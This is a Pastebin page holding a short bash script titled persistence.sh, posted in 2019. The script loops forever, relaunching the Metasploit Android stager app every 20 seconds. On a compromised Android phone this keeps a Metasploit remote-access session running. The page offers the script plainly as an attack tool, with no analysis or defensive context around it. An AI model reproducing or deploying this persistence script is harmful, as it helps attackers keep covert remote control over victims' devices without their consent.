hackernix

persistence.sh

Apr 21st, 2019
374
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. #!/bin/bash
  2. while true
  3. do am start --user 0 -a android.intent.action.MAIN -n com.metasploit.stage/.MainActivity
  4. sleep 20
  5. done
Add Comment
Please, Sign In to add comment